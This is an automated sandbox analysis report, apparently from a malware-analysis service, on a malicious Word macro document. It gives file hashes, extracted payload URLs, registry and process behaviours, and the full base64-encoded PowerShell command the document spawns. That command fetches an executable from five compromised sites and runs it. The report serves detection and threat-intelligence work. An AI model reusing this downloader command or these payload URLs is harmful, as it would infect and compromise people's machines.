Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
01-08-2020 19:38
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.9920.3882.15200.doc
Resource
win7v200722
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Exploit.Siggen2.9920.3882.15200.doc
Resource
win10v200722
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.9920.3882.15200.doc
-
Size
175KB
-
MD5
0044ba776778e2f3ec800a96294ce8b3
-
SHA1
0a3c6df795a29e3eef7ddf0aa2bfa03daf401e6e
-
SHA256
7ef18f7b96100c4dc8a648050ff5c5995b2ba175593ecbdde9a2c66ddb0a5efe
-
SHA512
d7ff746f87d9d43b5e104bebe979585de4a96d292bf3dfb057e8cc1a06298373bd762f7c18759c9f2cfd93abddc573d03c5baf3c0c62632b73dc7c418a0e4ded
Malware Config
Extracted
https://fastreadhotnews.com/assets/87nzy_l5_nsek/
http://xycgsck.com/wp-admin/4ltp_6h_d6hcijri8/
https://boulderinn.com/cgi-bin/710sj1hy96ynyfens7bm53a9h_7gpg2a_g1487pb/
http://chcquimica.com.br/loja/qtbmmjrt14kd4ot_t9cfy83_g42n8ts6/
http://gijsvanroij.nl/170101/cua5mnzjfcg8bi8esjju_ryiud_qjv2zcgixs/
Signatures
-
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
WINWORD.EXEpid process 500 WINWORD.EXE 500 WINWORD.EXE 500 WINWORD.EXE 500 WINWORD.EXE 500 WINWORD.EXE 500 WINWORD.EXE 500 WINWORD.EXE 500 WINWORD.EXE 500 WINWORD.EXE 500 WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 500 WINWORD.EXE 500 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3668 1028 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 3668 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powersheLL.exepid process 3668 powersheLL.exe 3668 powersheLL.exe 3668 powersheLL.exe -
Blacklisted process makes network request 5 IoCs
Processes:
powersheLL.exeflow pid process 26 3668 powersheLL.exe 28 3668 powersheLL.exe 30 3668 powersheLL.exe 32 3668 powersheLL.exe 34 3668 powersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.9920.3882.15200.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JAByAGUAaQB6AG4AZQBpAGcAYgBlAG8AYgBsAGEAaQBrAD0AJwB0AGgAbwB1AGMAcQB1AGkAZQB0AGMAbwBvAHAAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGMAYABVAFIASQBgAFQAWQBQAHIAbwBgAFQAYABvAGMAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAagBlAGEAbABzAGkAYQBqAHoAZQBlAHYAeABhAGMAaAAgAD0AIAAnADkANwAyACcAOwAkAGQAbwB1AGsAdwBpAG8AYgBnAGUAZQBqAHcAZQB6AD0AJwB4AG8AZQBxAHUAbQBpAGUAdAAnADsAJABiAG8AaQB0AGgAYgBhAG8AbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBlAGEAbABzAGkAYQBqAHoAZQBlAHYAeABhAGMAaAArACcALgBlAHgAZQAnADsAJAB4AG8AaQB6AHQAaABlAGEAYwBoAG8AbwBrAD0AJwBzAG8AaQBzAGgAZQBlAGMAaABhAHoAcABlAG8AYwAnADsAJAB5AG8AagBjAGgAZQBhAGcAdgBvAGcAdABoAG8AZQB6AD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABqAGkAYQBsAGQAbwB2AGoAZQBmAD0AJwBoAHQAdABwAHMAOgAvAC8AZgBhAHMAdAByAGUAYQBkAGgAbwB0AG4AZQB3AHMALgBjAG8AbQAvAGEAcwBzAGUAdABzAC8AOAA3AG4AegB5AF8AbAA1AF8AbgBzAGUAawAvACoAaAB0AHQAcAA6AC8ALwB4AHkAYwBnAHMAYwBrAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA0AGwAdABwAF8ANgBoAF8AZAA2AGgAYwBpAGoAcgBpADgALwAqAGgAdAB0AHAAcwA6AC8ALwBiAG8AdQBsAGQAZQByAGkAbgBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANwAxADAAcwBqADEAaAB5ADkANgB5AG4AeQBmAGUAbgBzADcAYgBtADUAMwBhADkAaABfADcAZwBwAGcAMgBhAF8AZwAxADQAOAA3AHAAYgAvACoAaAB0AHQAcAA6AC8ALwBjAGgAYwBxAHUAaQBtAGkAYwBhAC4AYwBvAG0ALgBiAHIALwBsAG8AagBhAC8AcQB0AGIAbQBtAGoAcgB0ADEANABrAGQANABvAHQAXwB0ADkAYwBmAHkAOAAzAF8AZwA0ADIAbgA4AHQAcwA2AC8AKgBoAHQAdABwADoALwAvAGcAaQBqAHMAdgBhAG4AcgBvAGkAagAuAG4AbAAvADEANwAwADEAMAAxAC8AYwB1AGEANQBtAG4AegBqAGYAYwBnADgAYgBpADgAZQBzAGoAagB1AF8AcgB5AGkAdQBkAF8AcQBqAHYAMgB6AGMAZwBpAHgAcwAvACcALgAiAHMAcABMAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAagBpAG8AZwB5AGUAdQBxAHUAdABhAGUAYgB6AGUAZQBsAD0AJwBtAGEAZgBqAGEAdQBnAHQAYQBlAGYAYgBlAG8AZAAnADsAZgBvAHIAZQBhAGMAaAAoACQAaABvAG8AbABzAGEAaQBmAHkAZQBhAHMAIABpAG4AIAAkAGoAaQBhAGwAZABvAHYAagBlAGYAKQB7AHQAcgB5AHsAJAB5AG8AagBjAGgAZQBhAGcAdgBvAGcAdABoAG8AZQB6AC4AIgBEAGAAbwBXAE4AbABPAEEAYABkAGYASQBsAEUAIgAoACQAaABvAG8AbABzAGEAaQBmAHkAZQBhAHMALAAgACQAYgBvAGkAdABoAGIAYQBvAG4AKQA7ACQAYwBvAHUAYwBoAHkAYQBvAHMAPQAnAHIAbwBlAHcAZgBhAG8AdAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAGIAbwBpAHQAaABiAGEAbwBuACkALgAiAEwAZQBuAGAARwBUAEgAIgAgAC0AZwBlACAAMgAwADkANgAwACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIAZQBgAEEAYABUAGUAIgAoACQAYgBvAGkAdABoAGIAYQBvAG4AKQA7ACQAZABvAGEAbAB5AHUAdQBqAGoAYQBuAGMAYQBvAHQAPQAnAG0AZQBhAGcAcQB1AGkAZQB0AGgAJwA7AGIAcgBlAGEAawA7ACQAZwBpAGUAcwByAG8AbwBuAGMAZQBpAHQAPQAnAGoAYQB1AGMAaABzAGEAZQBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHAAZQBpAHYAaAB1AGMAaABoAGEAbwBnAD0AJwBwAHUAYQB0AG0AaQBvAGoAJwA=1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request